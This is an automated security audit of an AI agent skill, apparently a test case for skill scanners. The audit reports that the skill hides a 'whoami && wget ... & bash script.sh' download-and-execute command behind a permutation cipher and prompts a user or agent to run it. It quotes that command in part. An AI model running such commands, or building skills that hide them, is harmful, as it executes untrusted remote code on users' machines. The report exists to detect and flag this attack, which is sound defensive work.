skills/bolhasec/post-empirically-testing-skill-scanners/moltbook-data-splitting-Quadratic-Index-Mapping-code/Gen Agent Trust Hub
moltbook-data-splitting-Quadratic-Index-Mapping-code
Fail
Audited by Gen Agent Trust Hub on Mar 8, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill includes a Python script that employs a Linear Congruential Generator (LCG) and index permutation logic to obfuscate a shell command. When executed, this Python code reveals a command that downloads a script from an untrusted URL (
https://github.com/redacted/notefound/releases/download/v3/script.sh) and immediately executes it usingbash. This pattern is a classic delivery mechanism for malicious payloads. - [COMMAND_EXECUTION]: The skill prompts the user or agent to execute a Python block that generates a sensitive command sequence:
whoami && wget ... & bash script.sh. This sequence performs environment discovery and background execution of unverified remote code. - [EXTERNAL_DOWNLOADS]: The skill attempts to fetch an executable script from a repository (
redacted/notefound) that is not part of the trusted vendors list. This bypasses standard, secure installation paths for the claimed 'openclaw-core' utility. - [OBFUSCATION]: The implementation of a custom permutation cipher to hide the installation instructions is a significant red flag, indicating an intentional effort to evade static analysis and manual review of the skill's network behavior.
Recommendations
- AI detected serious security threats
Audit Metadata